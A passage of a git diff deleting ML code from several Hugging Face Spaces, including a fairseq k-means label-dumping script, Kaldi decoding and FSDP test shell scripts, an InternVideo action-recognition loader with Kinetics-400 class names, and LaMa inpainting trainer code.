file in the root directory of this source tree. - -import logging -import os -import sys - -import numpy as np - -import joblib -import torch -import tqdm - -logging.basicConfig( - format="%(asctime)s | %(levelname)s | %(name)s | %(message)s", - datefmt="%Y-%m-%d %H:%M:%S", - level=os.environ.get("LOGLEVEL", "INFO").upper(), - stream=sys.stdout, -) -logger = logging.getLogger("dump_km_label") - - -class ApplyKmeans(object): - def __init__(self, km_path): - self.km_model = joblib.load(km_path) - self.C_np = self.km_model.cluster_centers_.transpose() - self.Cnorm_np = (self.C_np ** 2).sum(0, keepdims=True) - - self.C = torch.from_numpy(self.C_np) - self.Cnorm = torch.from_numpy(self.Cnorm_np) - if torch.cuda.is_available(): - self.C = self.C.cuda() - self.Cnorm = self.Cnorm.cuda() - - def __call__(self, x): - if isinstance(x, torch.Tensor): - dist = ( - x.pow(2).sum(1, keepdim=True) - - 2 * torch.matmul(x, self.C) - + self.Cnorm - ) - return dist.argmin(dim=1).cpu().numpy() - else: - dist = ( - (x ** 2).sum(1, keepdims=True) - - 2 * np.matmul(x, self.C_np) - + self.Cnorm_np - ) - return np.argmin(dist, axis=1) - - -def get_feat_iterator(feat_dir, split, nshard, rank): - feat_path = f"{feat_dir}/{split}_{rank}_{nshard}.npy" - leng_path = f"{feat_dir}/{split}_{rank}_{nshard}.len" - with open(leng_path, "r") as f: - lengs = [int(line.rstrip()) for line in f] - offsets = [0] + np.cumsum(lengs[:-1]).tolist() - - def iterate(): - feat = np.load(feat_path, mmap_mode="r") - assert feat.shape[0] == (offsets[-1] + lengs[-1]) - for offset, leng in zip(offsets, lengs): - yield feat[offset: offset + leng] - - return iterate, len(lengs) - - -def dump_label(feat_dir, split, km_path, nshard, rank, lab_dir): - apply_kmeans = ApplyKmeans(km_path) - generator, num = get_feat_iterator(feat_dir, split, nshard, rank) - iterator = generator() - - lab_path = f"{lab_dir}/{split}_{rank}_{nshard}.km" - os.makedirs(lab_dir, exist_ok=True) - with open(lab_path, "w") as f: - for feat in tqdm.tqdm(iterator, total=num): - # feat = torch.from_numpy(feat).cuda() - lab = apply_kmeans(feat).tolist() - f.write(" ".join(map(str, lab)) + "\n") - logger.info("finished successfully") - - -if __name__ == "__main__": - import argparse - - parser = argparse.ArgumentParser() - parser.add_argument("feat_dir") - parser.add_argument("split") - parser.add_argument("km_path") - parser.add_argument("nshard", type=int) - parser.add_argument("rank", type=int) - parser.add_argument("lab_dir") - args = parser.parse_args() - logging.info(str(args)) - - dump_label(**vars(args)) diff --git a/spaces/OFA-Sys/OFA-vqa/fairseq/examples/wav2vec/unsupervised/kaldi_self_train/st/decode_word_step1.sh b/spaces/OFA-Sys/OFA-vqa/fairseq/examples/wav2vec/unsupervised/kaldi_self_train/st/decode_word_step1.sh deleted file mode 100644 index c1276bbe4d0e02deb984c7c10d6c0486dce09a5f..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-vqa/fairseq/examples/wav2vec/unsupervised/kaldi_self_train/st/decode_word_step1.sh +++ /dev/null @@ -1,46 +0,0 @@ -#!/bin/bash - -# prepare word WFSTs, reference data, and decode - -set -eu - -w2v_dir= # same as in train.sh -out_dir= # same as in train.sh -lexicon= # word to phone mapping -wrd_arpa_lm= # word LM -wrd_arpa_lm_bin= # word LM for KenLM, used in unsupervised selection - -dec_exp= # what HMM stage to decode (e.g., tri3b) -dec_script= # what decoding script to use (e.g., steps/decode_fmllr.sh) -phn_label=phnc -wrd_label=wrd -dec_suffix=word -dec_splits="train valid" -valid_split="valid" - -data_dir=$out_dir/data -wrd_data_dir=$out_dir/data_word - -lexicon_clean=$(mktemp) -cat $lexicon | sort | uniq > $lexicon_clean -local/prepare_lang_word.sh $w2v_dir/dict.${phn_label}.txt $data_dir $lexicon_clean && rm $lexicon_clean -local/prepare_lm.sh --langdir $data_dir/lang_word --lmdir $data_dir/lang_test_word $wrd_arpa_lm $data_dir - -for x in $dec_splits; do - x_gt=${x}_gt - mkdir -p $wrd_data_dir/$x_gt - cp $data_dir/$x_gt/{feats.scp,cmvn.scp,utt2spk,spk2utt} $wrd_data_dir/$x_gt/ - python local/copy_aligned_text.py < $w2v_dir/$x.$wrd_label > $wrd_data_dir/$x_gt/text -done - -local/decode.sh --nj 40 --graph_name graph${dec_suffix} --decode_suffix $dec_suffix \ - --val_sets "$dec_splits" --decode_script $dec_script \ - $out_dir/exp/$dec_exp $data_dir $data_dir/lang_test_word - -local/unsup_select_decode_word.sh \ - --split $valid_split --kenlm_path $wrd_arpa_lm_bin \ - --ref_txt $wrd_data_dir/${valid_split}_gt/text \ - --psd_txt $data_dir/${valid_split}/text \ - --dec_name decode${dec_suffix} --graph_name graph${dec_suffix} \ - --phonemize_lexicon $data_dir/local/dict_word/lexicon.txt \ - $out_dir/exp diff --git a/spaces/OFA-Sys/OFA-vqa/fairseq/scripts/test_fsdp.sh b/spaces/OFA-Sys/OFA-vqa/fairseq/scripts/test_fsdp.sh deleted file mode 100644 index 1f428a035e4474427ded991f8e8307ea59f61f69..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-vqa/fairseq/scripts/test_fsdp.sh +++ /dev/null @@ -1,24 +0,0 @@ -#!/usr/bin/env bash -rm -rf fsdp_dummy -mkdir -p fsdp_dummy -CUDA_VISIBLE_DEVICES=0,1,2,3 fairseq-train /private/home/sshleifer/data-bin/stories_mmap \ - --ddp-backend fully_sharded --fp16 --fp16-init-scale 4 \ - --cpu-offload --checkpoint-activations \ - --task language_modeling --tokens-per-sample 256 --batch-size 8 \ - --arch transformer_lm_gpt2_tiny \ - --optimizer cpu_adam --adam-betas "(0.9,0.98)" \ - --lr 0.0001 --lr-scheduler polynomial_decay --warmup-updates 5 --total-num-update 10 \ - --max-update 5 --log-format json --log-interval 1 \ - --save-interval-updates 5 --save-dir fsdp_dummy --disable-validation \ - --restore-file x.pt "$@" - -# Now we try to load the checkpoint -CUDA_VISIBLE_DEVICES=0,1 fairseq-train /private/home/sshleifer/data-bin/stories_mmap \ - --ddp-backend fully_sharded --fp16 --fp16-init-scale 4 \ - --cpu-offload --checkpoint-activations \ - --task language_modeling --tokens-per-sample 256 --batch-size 8 \ - --arch transformer_lm_gpt2_tiny \ - --optimizer cpu_adam --adam-betas "(0.9,0.98)" \ - --lr 0.0001 --lr-scheduler polynomial_decay --warmup-updates 5 --total-num-update 10 \ - --max-update 2 --log-format json --log-interval 1 \ - --save-interval-updates 2 --save-dir fsdp_dummy diff --git a/spaces/OkamiFeng/Bark-with-Voice-Cloning/training/__init__.py b/spaces/OkamiFeng/Bark-with-Voice-Cloning/training/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/OpenGVLab/InternGPT/iGPT/models/load_internvideo.py b/spaces/OpenGVLab/InternGPT/iGPT/models/load_internvideo.py deleted file mode 100644 index da24068b9ac20aa85195c0b2a0e36bf509e2371b..0000000000000000000000000000000000000000 --- a/spaces/OpenGVLab/InternGPT/iGPT/models/load_internvideo.py +++ /dev/null @@ -1,469 +0,0 @@ -from .intern_action import intern_action_b16 -from huggingface_hub import hf_hub_download -# from kinetics_class_index import kinetics_classnames -import torch -import torch.nn as nn -import torchvision.transforms as T -import torch.nn.functional as F -import numpy as np - -from .processing import ( - GroupNormalize, GroupScale, GroupCenterCrop, - Stack, ToTorchFormatTensor -) - -class Intern_Action(nn.Module): - def __init__(self, model): - super().__init__() - self.backbone = model - - def forward(self, x): - return self.backbone(x) - -def get_index(num_frames, num_segments=8): - seg_size = float(num_frames - 1) / num_segments - start = int(seg_size / 2) - offsets = np.array([ - start + int(np.round(seg_size * idx)) for idx in range(num_segments) - ]) - return offsets - -def transform_action(): - # transform - crop_size = 224 - scale_size = 256 - input_mean = [0.485, 0.456, 0.406] - input_std = [0.229, 0.224, 0.225] - - return T.Compose([ - # T.ToPILImage(), - GroupScale(int(scale_size)), - GroupCenterCrop(crop_size), - Stack(), - ToTorchFormatTensor(), - GroupNormalize(input_mean, input_std) - ]) - -def load_intern_action(device): - # Create an id to label name mapping - kinetics_id_to_classname = {} - for k, v in kinetics_classnames.items(): - kinetics_id_to_classname[k] = v - - model_path = hf_hub_download(repo_id="Andy1621/uniformerv2", filename="k400+k710_uniformerv2_b16_8x224.pyth") - # Pick a pretrained model - model = Intern_Action(intern_action_b16(pretrained=False, t_size=8, no_lmhra=True, temporal_downsample=False)) - state_dict = torch.load(model_path, map_location=device) - model.load_state_dict(state_dict) - # Set to eval mode and move to desired device - model = model.to(device) - model = model.eval() - return model - -def cut_frame_to_8(data): - index = np.linspace(0, len(data)-1, 8).astype(int) - return data[index] - -kinetics_classnames = { - "0": "riding a bike", - "1": "marching", - "2": "dodgeball", - "3": "playing cymbals", - "4": "checking tires", - "5": "roller skating", - "6": "tasting beer", - "7": "clapping", - "8": "drawing", - "9": "juggling fire", - "10": "bobsledding", - "11": "petting animal (not cat)", - "12": "spray painting", - "13": "training dog", - "14": "eating watermelon", - "15": "building cabinet", - "16": "applauding", - "17": "playing harp", - "18": "balloon blowing", - "19": "sled dog racing", - "20": "wrestling", - "21": "pole vault", - "22": "hurling (sport)", - "23": "riding scooter", - "24": "shearing sheep", - "25": "sweeping floor", - "26": "eating carrots", - "27": "skateboarding", - "28": "dunking basketball", - "29": "disc golfing", - "30": "eating spaghetti", - "31": "playing flute", - "32": "riding mechanical bull", - "33": "making sushi", - "34": "trapezing", - "35": "picking fruit", - "36": "stretching leg", - "37": "playing ukulele", - "38": "tying tie", - "39": "skydiving", - "40": "playing cello", - "41": "jumping into pool", - "42": "shooting goal (soccer)", - "43": "trimming trees", - "44": "bookbinding", - "45": "ski jumping", - "46": "walking the dog", - "47": "riding unicycle", - "48": "shaving head", - "49": "hopscotch", - "50": "playing piano", - "51": "parasailing", - "52": "bartending", - "53": "kicking field goal", - "54": "finger snapping", - "55": "dining", - "56": "yawning", - "57": "peeling potatoes", - "58": "canoeing or kayaking", - "59": "front raises", - "60": "laughing", - "61": "dancing macarena", - "62": "digging", - "63": "reading newspaper", - "64": "hitting baseball", - "65": "clay pottery making", - "66": "exercising with an exercise ball", - "67": "playing saxophone", - "68": "shooting basketball", - "69": "washing hair", - "70": "lunge", - "71": "brushing hair", - "72": "curling hair", - "73": "kitesurfing", - "74": "tapping guitar", - "75": "bending back", - "76": "skipping rope", - "77": "situp", - "78": "folding paper", - "79": "cracking neck", - "80": "assembling computer", - "81": "cleaning gutters", - "82": "blowing out candles", - "83": "shaking hands", - "84": "dancing gangnam style", - "85": "windsurfing", - "86": "tap dancing", - "87": "skiing (not slalom or crosscountry)", - "88": "bandaging", - "89": "push up", - "90": "doing nails", - "91": "punching person (boxing)", - "92": "bouncing on trampoline", - "93": "scrambling eggs", - "94": "singing", - "95": "cleaning floor", - "96": "krumping", - "97": "drumming fingers", - "98": "snowmobiling", - "99": "gymnastics tumbling", - "100": "headbanging", - "101": "catching or throwing frisbee", - "102": "riding elephant", - "103": "bee keeping", - "104": "feeding birds", - "105": "snatch weight lifting", - "106": "mowing lawn", - "107": "fixing hair", - "108": "playing trumpet", - "109": "flying kite", - "110": "crossing river", - "111": "swinging legs", - "112": "sanding floor", - "113": "belly dancing", - "114": "sneezing", - "115": "clean and jerk", - "116": "side kick", - "117": "filling eyebrows", - "118": "shuffling cards", - "119": "recording music", - "120": "cartwheeling", - "121": "feeding fish", - "122": "folding clothes", - "123": "water skiing", - "124": "tobogganing", - "125": "blowing leaves", - "126": "smoking", - "127": "unboxing", - "128": "tai chi", - "129": "waxing legs", - "130": "riding camel", - "131": "slapping", - "132": "tossing salad", - "133": "capoeira", - "134": "playing cards", - "135": "playing organ", - "136": "playing violin", - "137": "playing drums", - "138": "tapping pen", - "139": "vault", - "140": "shoveling snow", - "141": "playing tennis", - "142": "getting a tattoo", - "143": "making a sandwich", - "144": "making tea", - "145": "grinding meat", - "146": "squat", - "147": "eating doughnuts", - "148": "ice fishing", - "149": "snowkiting", - "150": "kicking soccer ball", - "151": "playing controller", - "152": "giving or receiving award", - "153": "welding", - "154": "throwing discus", - "155": "throwing axe", - "156": "ripping paper", - "157": "swimming butterfly stroke", - "158": "air drumming", - "159": "blowing nose", - "160": "hockey stop", - "161": "taking a shower", - "162": "bench pressing", - "163": "planting trees", - "164": "pumping fist", - "165": "climbing tree", - "166": "tickling", - "167": "high kick", - "168": "waiting in line", - "169": "slacklining", - "170": "tango dancing", - "171": "hurdling", - "172": "carrying baby", - "173": "celebrating", - "174": "sharpening knives", - "175": "passing American football (in game)", - "176": "headbutting", - "177": "playing recorder", - "178": "brush painting", - "179": "garbage collecting", - "180": "robot dancing", - "181": "shredding paper", - "182": "pumping gas", - "183": "rock climbing", - "184": "hula hooping", - "185": "braiding hair", - "186": "opening present", - "187": "texting", - "188": "decorating the christmas tree", - "189": "answering questions", - "190": "playing keyboard", - "191": "writing", - "192": "bungee jumping", - "193": "sniffing", - "194": "eating burger", - "195": "playing accordion", - "196": "making pizza", - "197": "playing volleyball", - "198": "tasting food", - "199": "pushing cart", - "200": "spinning poi", - "201": "cleaning windows", - "202": "arm wrestling", - "203": "changing oil", - "204": "swimming breast stroke", - "205": "tossing coin", - "206": "deadlifting", - "207": "hoverboarding", - "208": "cutting watermelon", - "209": "cheerleading", - "210": "snorkeling", - "211": "washing hands", - "212": "eating cake", - "213": "pull ups", - "214": "surfing water", - "215": "eating hotdog", - "216": "holding snake", - "217": "playing harmonica", - "218": "ironing", - "219": "cutting nails", - "220": "golf chipping", - "221": "shot put", - "222": "hugging", - "223": "playing clarinet", - "224": "faceplanting", - "225": "trimming or shaving beard", - "226": "drinking shots", - "227": "riding mountain bike", - "228": "tying bow tie", - "229": "swinging on something", - "230": "skiing crosscountry", - "231": "unloading truck", - "232": "cleaning pool", - "233": "jogging", - "234": "ice climbing", - "235": "mopping floor", - "236": "making bed", - "237": "diving cliff", - "238": "washing dishes", - "239": "grooming dog", - "240": "weaving basket", - "241": "frying vegetables", - "242": "stomping grapes", - "243": "moving furniture", - "244": "cooking sausages", - "245": "doing laundry", - "246": "dying hair", - "247": "knitting", - "248": "reading book", - "249": "baby waking up", - "250": "punching bag", - "251": "surfing crowd", - "252": "cooking chicken", - "253": "pushing car", - "254": "springboard diving", - "255": "swing dancing", - "256": "massaging legs", - "257": "beatboxing", - "258": "breading or breadcrumbing", - "259": "somersaulting", - "260": "brushing teeth", - "261": "stretching arm", - "262": "juggling balls", - "263": "massaging person's head", - "264": "eating ice cream", - "265": "extinguishing fire", - "266": "hammer throw", - "267": "whistling", - "268": "crawling baby", - "269": "using remote controller (not gaming)", - "270": "playing cricket", - "271": "opening bottle", - "272": "playing xylophone", - "273": "motorcycling", - "274": "driving car", - "275": "exercising arm", - "276": "passing American football (not in game)", - "277": "playing kickball", - "278": "sticking tongue out", - "279": "flipping pancake", - "280": "catching fish", - "281": "eating chips", - "282": "shaking head", - "283": "sword fighting", - "284": "playing poker", - "285": "cooking on campfire", - "286": "doing aerobics", - "287": "paragliding", - "288": "using segway", - "289": "folding napkins", - "290": "playing bagpipes", - "291": "gargling", - "292": "skiing slalom", - "293": "strumming guitar", - "294": "javelin throw", - "295": "waxing back", - "296": "riding or walking with horse", - "297": "plastering", - "298": "long jump", - "299": "parkour", - "300": "wrapping present", - "301": "egg hunting", - "302": "archery", - "303": "cleaning toilet", - "304": "swimming backstroke", - "305": "snowboarding", - "306": "catching or throwing baseball", - "307": "massaging back", - "308": "blowing glass", - "309": "playing guitar", - "310": "playing chess", - "311": "golf driving", - "312": "presenting weather forecast", - "313": "rock scissors paper", - "314": "high jump", - "315": "baking cookies", - "316": "using computer", - "317": "washing feet", - "318": "arranging flowers", - "319": "playing bass guitar", - "320": "spraying", - "321": "cutting pineapple", - "322": "waxing chest", - "323": "auctioning", - "324": "jetskiing", - "325": "drinking", - "326": "busking", - "327": "playing monopoly", - "328": "salsa dancing", - "329": "waxing eyebrows", - "330": "watering plants", - "331": "zumba", - "332": "chopping wood", - "333": "pushing wheelchair", - "334": "carving pumpkin", - "335": "building shed", - "336": "making jewelry", - "337": "catching or throwing softball", - "338": "bending metal", - "339": "ice skating", - "340": "dancing charleston", - "341": "abseiling", - "342": "climbing a rope", - "343": "crying", - "344": "cleaning shoes", - "345": "dancing ballet", - "346": "driving tractor", - "347": "triple jump", - "348": "throwing ball", - "349": "getting a haircut", - "350": "running on treadmill", - "351": "climbing ladder", - "352": "blasting sand", - "353": "playing trombone", - "354": "drop kicking", - "355": "country line dancing", - "356": "changing wheel", - "357": "feeding goats", - "358": "tying knot (not on a tie)", - "359": "setting table", - "360": "shaving legs", - "361": "kissing", - "362": "riding mule", - "363": "counting money", - "364": "laying bricks", - "365": "barbequing", - "366": "news anchoring", - "367": "smoking hookah", - "368": "cooking egg", - "369": "peeling apples", - "370": "yoga", - "371": "sharpening pencil", - "372": "dribbling basketball", - "373": "petting cat", - "374": "playing ice hockey", - "375": "milking cow", - "376": "shining shoes", - "377": "juggling soccer ball", - "378": "scuba diving", - "379": "playing squash or racquetball", - "380": "drinking beer", - "381": "sign language interpreting", - "382": "playing basketball", - "383": "breakdancing", - "384": "testifying", - "385": "making snowman", - "386": "golf putting", - "387": "playing didgeridoo", - "388": "biking through snow", - "389": "sailing", - "390": "jumpstyle dancing", - "391": "water sliding", - "392": "grooming horse", - "393": "massaging feet", - "394": "playing paintball", - "395": "making a cake", - "396": "bowling", - "397": "contact juggling", - "398": "applying cream", - "399": "playing badminton" -} - diff --git a/spaces/OpenGVLab/InternGPT/third-party/lama/bin/saicinpainting/training/trainers/base.py b/spaces/OpenGVLab/InternGPT/third-party/lama/bin/saicinpainting/training/trainers/base.py deleted file mode 100644 index f1b1c66fc96e7edfba7b1ee193272f92b5db7438..0000000000000000000000000000000000000000 --- a/spaces/OpenGVLab/InternGPT/third-party/lama/bin/saicinpainting/training/trainers/base.py +++ /dev/null @@ -1,291 +0,0 @@ -import copy -import logging -from typing import Dict, Tuple - -import pandas as pd -import pytorch_lightning as ptl -import torch -import torch.nn as nn -import torch.nn.functional as F -from torch.utils.data import DistributedSampler - -from saicinpainting.evaluation import make_evaluator -from saicinpainting.training.data.datasets import make_default_train_dataloader, make_default_val_dataloader -from saicinpainting.training.losses.adversarial import make_discrim_loss -from saicinpainting.training.losses.perceptual import PerceptualLoss, ResNetPL -from saicinpainting.training.modules import make_generator, make_discriminator -from saicinpainting.training.visualizers import make_visualizer -from saicinpainting.utils import add_prefix_to_keys, average_dicts, set_requires_grad, flatten_dict, \ - get_has_ddp_rank - -LOGGER = logging.getLogger(__name__) - - -def make_optimizer(parameters, kind='adamw', **kwargs): - if kind == 'adam': - optimizer_class = torch.optim.Adam - elif kind == 'adamw': - optimizer_class = torch.optim.AdamW - else: - raise ValueError(f'Unknown optimizer kind {kind}') - return optimizer_class(parameters, **kwargs) - - -def update_running_average(result: nn.Module, new_iterate_model: nn.Module, decay=0.999): - with torch.no_grad(): - res_params = dict(result.named_parameters()) - new_params = dict(new_iterate_model.named_parameters()) - - for k in res_params.keys(): - res_params[k].data.mul_(decay).add_(new_params[k].data, alpha=1 - decay) - - -def make_multiscale_noise(base_tensor, scales=6, scale_mode='bilinear'): - batch_size, _, height, width = base_tensor.shape - cur_height, cur_width = height, width - result = [] - align_corners = False if scale_mode in ('bilinear', 'bicubic') else None - for _ in range(scales): - cur_sample = torch.randn(batch_size, 1, cur_height, cur_width, device=base_tensor.device) - cur_sample_scaled = F.interpolate(cur_sample, size=(height, width), mode=scale_mode, align_corners=align_corners) - result.append(cur_sample_scaled) - cur_height //= 2 - cur_width //= 2 - return torch.cat(result, dim=1) - - -class BaseInpaintingTrainingModule(ptl.LightningModule): - def __init__(self, config, use_ddp, *args, predict_only=False, visualize_each_iters=100, - average_generator=False, generator_avg_beta=0.999, average_generator_start_step=30000, - average_generator_period=10, store_discr_outputs_for_vis=False, - **kwargs): - super().__init__(*args, **kwargs) - LOGGER.info('BaseInpaintingTrainingModule init called') - - self.config = config - - self.generator = make_generator(config, **self.config.generator) - self.use_ddp = use_ddp - - if not get_has_ddp_rank(): - LOGGER.info(f'Generator\n{self.generator}') - - if not predict_only: - self.save_hyperparameters(self.config) - self.discriminator = make_discriminator(**self.config.discriminator) - self.adversarial_loss = make_discrim_loss(**self.config.losses.adversarial) - self.visualizer = make_visualizer(**self.config.visualizer) - self.val_evaluator = make_evaluator(**self.config.evaluator) - self.test_evaluator = make_evaluator(**self.config.evaluator) - - if not get_has_ddp_rank(): - LOGGER.info(f'Discriminator\n{self.discriminator}') - - extra_val = self.config.data.get('extra_val', ()) - if extra_val: - self.extra_val_titles = list(extra_val) - self.extra_evaluators = nn.ModuleDict({k: make_evaluator(**self.config.evaluator) - for k in extra_val}) - else: - self.extra_evaluators = {} - - self.average_generator = average_generator - self.generator_avg_beta = generator_avg_beta - self.average_generator_start_step = average_generator_start_step - self.average_generator_period = average_generator_period - self.generator_average = None - self.last_generator_averaging_step = -1 - self.store_discr_outputs_for_vis = store_discr_outputs_for_vis - - if self.config.losses.get("l1", {"weight_known": 0})['weight_known'] > 0: - self.loss_l1 = nn.L1Loss(reduction='none') - - if self.config.losses.get("mse", {"weight": 0})['weight'] > 0: - self.loss_mse = nn.MSELoss(reduction='none') - - if self.config.losses.perceptual.weight > 0: - self.loss_pl = PerceptualLoss() - - if self.config.losses.get("resnet_pl", {"weight": 0})['weight'] > 0: - self.loss_resnet_pl = ResNetPL(**self.config.losses.resnet_pl) - else: - self.loss_resnet_pl = None - - self.visualize_each_iters = visualize_each_iters - LOGGER.info('BaseInpaintingTrainingModule init done') - - def configure_optimizers(self): - discriminator_params = list(self.discriminator.parameters()) - return [ - dict(optimizer=make_optimizer(self.generator.parameters(), **self.config.optimizers.generator)), - dict(optimizer=make_optimizer(discriminator_params, **self.config.optimizers.discriminator)), - ] - - def train_dataloader(self): - kwargs = dict(self.config.data.train) - if self.use_ddp: - kwargs['ddp_kwargs'] = dict(num_replicas=self.trainer.num_nodes * self.trainer.num_processes, - rank=self.trainer.global_rank, - shuffle=True) - dataloader = make_default_train_dataloader(**self.config.data.train) - return dataloader - - def val_dataloader(self): - res = [make_default_val_dataloader(**self.config.data.val)] - - if self.config.data.visual_test is not None: - res = res + [make_default_val_dataloader(**self.config.data.visual_test)] - else: - res = res + res - - extra_val = self.config.data.get('extra_val', ()) - if extra_val: - res += [make_default_val_dataloader(**extra_val[k]) for k in self.extra_val_titles] - - return res - - def training_step(self, batch, batch_idx, optimizer_idx=None): - self._is_training_step = True - return self._do_step(batch, batch_idx, mode='train', optimizer_idx=optimizer_idx) - - def validation_step(self, batch, batch_idx, dataloader_idx): - extra_val_key = None - if dataloader_idx == 0: - mode = 'val' - elif dataloader_idx == 1: - mode = 'test' - else: - mode = 'extra_val' - extra_val_key = self.extra_val_titles[dataloader_idx - 2] - self._is_training_step = False - return self._do_step(batch, batch_idx, mode=mode, extra_val_key=extra_val_key) - - def training_step_end(self, batch_parts_outputs): - if self.training and self.average_generator \ - and self.global_step >= self.average_generator_start_step \ - and self.global_step >= self.last_generator_averaging_step + self.average_generator_period: - if self.generator_average is None: - self.generator_average = copy.deepcopy(self.generator) - else: - update_running_average(self.generator_average, self.generator, decay=self.generator_avg_beta) - self.last_generator_averaging_step = self.global_step - - full_loss = (batch_parts_outputs['loss'].mean() - if torch.is_tensor(batch_parts_outputs['loss']) # loss is not tensor when no discriminator used - else torch.tensor(batch_parts_outputs['loss']).float().requires_grad_(True)) - log_info = {k: v.mean() for k, v in batch_parts_outputs['log_info'].items()} - self.log_dict(log_info, on_step=True, on_epoch=False) - return full_loss - - def validation_epoch_end(self, outputs): - outputs = [step_out for out_group in outputs for step_out in out_group] - averaged_logs = average_dicts(step_out['log_info'] for step_out in outputs) - self.log_dict({k: v.mean() for k, v in averaged_logs.items()}) - - pd.set_option('display.max_columns', 500) - pd.set_option('display.width', 1000) - - # standard validation - val_evaluator_states = [s['val_evaluator_state'] for s in outputs if 'val_evaluator_state' in s] - val_evaluator_res = self.val_evaluator.evaluation_end(states=val_evaluator_states) - val_evaluator_res_df = pd.DataFrame(val_evaluator_res).stack(1).unstack(0) - val_evaluator_res_df.dropna(axis=1, how='all', inplace=True) - LOGGER.info(f'Validation metrics after epoch #{self.current_epoch}, ' - f'total {self.global_step} iterations:\n{val_evaluator_res_df}') - - for k, v in flatten_dict(val_evaluator_res).items(): - self.log(f'val_{k}', v) - - # standard visual test - test_evaluator_states = [s['test_evaluator_state'] for s in outputs - if 'test_evaluator_state' in s] - test_evaluator_res = self.test_evaluator.evaluation_end(states=test_evaluator_states) - test_evaluator_res_df = pd.DataFrame(test_evaluator_res).stack(1).unstack(0) - test_evaluator_res_df.dropna(axis=1, how='all', inplace=True) - LOGGER.info(f'Test metrics after epoch #{self.current_epoch}, ' - f'total {self.global_step} iterations:\n{test_evaluator_res_df}') - - for k, v in flatten_dict(test_evaluator_res).items(): - self.log(f'test_{k}', v) - - # extra validations - if self.extra_evaluators: - for cur_eval_title, cur_evaluator in self.extra_evaluators.items(): - cur_state_key = f'extra_val_{cur_eval_title}_evaluator_state' - cur_states = [s[cur_state_key] for s in outputs if cur_state_key in s] - cur_evaluator_res = cur_evaluator.evaluation_end(states=cur_states) - cur_evaluator_res_df = pd.DataFrame(cur_evaluator_res).stack(1).unstack(0) - cur_evaluator_res_df.dropna(axis=1, how='all', inplace=True) - LOGGER.info(f'Extra val {cur_eval_title} metrics after epoch #{self.current_epoch}, ' - f'total {self.global_step} iterations:\n{cur_evaluator_res_df}') - for k, v in flatten_dict(cur_evaluator_res).items(): - self.log(f'extra_val_{cur_eval_title}_{k}', v) - - def _do_step(self, batch, batch_idx, mode='train', optimizer_idx=None, extra_val_key=None): - if optimizer_idx == 0: # step for generator - set_requires_grad(self.generator, True) - set_requires_grad(self.discriminator, False) - elif optimizer_idx == 1: # step for discriminator - set_requires_grad(self.generator, False) - set_requires_grad(self.discriminator, True) - - batch = self(batch) - - total_loss = 0 - metrics = {} - - if optimizer_idx is None or optimizer_idx == 0: # step for generator - total_loss, metrics = self.generator_loss(batch) - - elif optimizer_idx is None or optimizer_idx == 1: # step for discriminator - if self.config.losses.adversarial.weight > 0: - total_loss, metrics = self.discriminator_loss(batch) - - if self.get_ddp_rank() in (None, 0) and (batch_idx % self.visualize_each_iters == 0 or mode == 'test'): - if self.config.losses.adversarial.weight > 0: - if self.store_discr_outputs_for_vis: - with torch.no_grad(): - self.store_discr_outputs(batch) - vis_suffix = f'_{mode}' - if mode == 'extra_val': - vis_suffix += f'_{extra_val_key}' - self.visualizer(self.current_epoch, batch_idx, batch, suffix=vis_suffix) - - metrics_prefix = f'{mode}_' - if mode == 'extra_val': - metrics_prefix += f'{extra_val_key}_' - result = dict(loss=total_loss, log_info=add_prefix_to_keys(metrics, metrics_prefix)) - if mode == 'val': - result['val_evaluator_state'] = self.val_evaluator.process_batch(batch) - elif mode == 'test': - result['test_evaluator_state'] = self.test_evaluator.process_batch(batch) - elif mode == 'extra_val': - result[f'extra_val_{extra_val_key}_evaluator_state'] = self.extra_evaluators[extra_val_key].process_batch(batch) - - return result - - def get_current_generator(self, no_average=False): - if not no_average and not self.training and self.average_generator and self.generator_average is not None: - return self.generator_average - return self.generator - - def forward(self, batch: Dict[str, torch.Tensor]) -> Dict[str, torch.Tensor]: - """Pass data through generator and obtain at leas 'predicted_image' and 'inpainted' keys""" - raise NotImplementedError() - - def generator_loss(self, batch) -> Tuple[torch.Tensor, Dict[str, torch.Tensor]]: - raise NotImplementedError() - - def discriminator_loss(self, batch) -> Tuple[torch.Tensor, Dict[str, torch.Tensor]]: - raise NotImplementedError() - - def store_discr_outputs(self, batch): - out_size = batch['image'].shape[2:] - discr_real_out, _ = self.discriminator(batch['image']) - discr_fake_out, _ = self.discriminator(batch['predicted_image']) - batch['discr_output_real'] = F.interpolate(discr_real_out, size=out_size, mode='nearest') - batch['discr_output_fake'] = F.interpolate(discr_fake_out, size=out_size, mode='nearest') - batch['discr_output_diff'] = batch['discr_output_real'] - batch['discr_output_fake'] - - def get_ddp_rank(self): - return self.trainer.global_rank if (self.trainer.num_nodes * self.trainer.num_processes) > 1 else None diff --git a/spaces/OpenGVLab/InternGPT/third-party/lama/saicinpainting/training/trainers/__init__.py b/spaces/OpenGVLab/InternGPT/third-party/lama/saicinpainting/training/trainers/__init__.py deleted file mode 100644 index c59241f553efe4e2dd6b198e2e5656a2b1488857..0000000000000000000000000000000000000000 --- a/spaces/OpenGVLab/InternGPT/third-party/lama/saicinpainting/training/trainers/__init__.py +++ /dev/null @@ -1,30 +0,0 @@ -import logging -import torch -from saicinpainting.training.trainers.default import DefaultInpaintingTrainingModule - - -def get_training_model_class(kind): - if kind == 'default': - return DefaultInpaintingTrainingModule - - raise ValueError(f'Unknown trainer module {kind}') - - -def make_training_model(config): - kind = config.training_model.kind - kwargs = dict(config.training_model) - kwargs.pop('kind') - kwargs['use_ddp'] = config.trainer.kwargs.get('accelerator', None) == 'ddp' - - logging.info(f'Make training model {kind}') - - cls = get_training_model_class(kind) - return cls(config, **kwargs) - - -def load_checkpoint(train_config, path, map_location='cuda', strict=True): - model: torch.nn.Module = make_training_model(train_config) - state = torch.load(path, map_location=map_location) - model.load_state_dict(state['state_dict'], strict=strict) - model.on_load_checkpoint(state) - return model diff --git a/spaces/OptimalScale/Robin-33b/lmflow/version.py b/spaces/OptimalScale/Robin-33b/lmflow/version.py deleted file mode 100644 index b3c06d488393abb3b3829e5590d42409c995b4cf..0000000000000000000000000000000000000000 --- a/spaces/OptimalScale/Robin-33b/lmflow/version.py +++ /dev/null @@ -1 +0,0 @@ -__version__ = "0.0.1" \ No newline at end of file diff --git a/spaces/OtmanSarrhini/foodvision_mini/README.md 